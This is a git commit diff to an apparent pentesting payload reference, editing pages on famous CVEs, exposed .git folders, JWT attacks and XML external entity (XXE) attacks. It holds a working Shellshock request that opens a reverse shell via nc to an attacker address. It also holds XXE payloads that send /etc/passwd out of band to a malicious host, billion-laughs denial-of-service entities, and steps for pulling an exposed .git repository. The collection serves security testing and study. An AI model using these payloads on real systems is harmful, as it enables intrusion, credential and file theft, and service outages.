Attacks details + Summary JWT + XXE adjustments

patch-1
Swissky 2018-11-26 00:25:06 +01:00
parent 928a454531
commit 521d61d956
4 changed files with 47 additions and 11 deletions

View File

@ -1,16 +1,29 @@
# Common Vulnerabilities and Exposures
Big CVEs in the last 5 years.
## CVE-2014-0160 - Heartbleed
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
## CVE-2014-6271 - Shellshock
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
```bash
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
```
## CVE-2017-5638 - Apache Struts 2
On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
## CVE-2018-7600 - Drupalgeddon 2
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
## Thanks to
* http://heartbleed.com
* https://en.wikipedia.org/wiki/Shellshock_(software_bug)
* [Heartbleed - Official website](http://heartbleed.com)
* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))
* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)

View File

@ -16,10 +16,16 @@
The following examples will create either a copy of the .git or a copy of the current commit.
Check for the following files, if they exist you can extract the .git folder.
- .git/config
- .git/HEAD
- .git/logs/HEAD
### Github example with a .git
1. Check 403 error (Forbidden) for .git or even better : directory listing
2. Git saves all informations in log file .git/logs/HEAD (try 'head' too)
1. Check 403 error (Forbidden) for .git or even better : a directory listing
2. Git saves all informations in log file .git/logs/HEAD (try 'head' in lowercase too)
```powershell
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.

View File

@ -2,6 +2,11 @@
> JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
- JWT Format
- JWT Signature - None algorithm
- JWT Signature - RS256 to HS256
- Breaking JWT's secret
## JWT Format
JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)`
@ -139,3 +144,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
- [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec)
- [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
- [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
- [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)

View File

@ -1,10 +1,11 @@
# XML External Entity
An XML External Entity attack is a type of attack against an application that parses XML input
An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities.
XML entities can be used to tell the XML parser to fetch specific content on the server.
## Exploit
Basic Test
Basic XML external entity test, the result should contain "John" in `firstName` and "Doe" in `lastName`.
```xml
<!--?xml version="1.0" ?-->
@ -67,14 +68,16 @@ Classic XXE Base64 encoded
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" >
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
]>
<foo>&xxe;</foo>
```
## Deny of service
Deny Of Service - Billion Laugh Attack
**Warning** : These attacks will disable the service or the server, do not use them on the Prod.
Billion Laugh Attack
```xml
<!DOCTYPE data [
@ -103,8 +106,12 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
## Blind XXE - Out of Band
Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
### Blind XXE
Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line.
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
@ -146,13 +153,17 @@ File stored on http://127.0.0.1/dtd.xml
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
```
### XXE Inside SOAP
### XXE inside SOAP
```xml
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
<soap:Body>
<foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
</foo>
</soap:Body>
```
### XXE Inside DOCX file
### XXE inside DOCX file
Format of an Open XML file (inject the payload in any .xml file):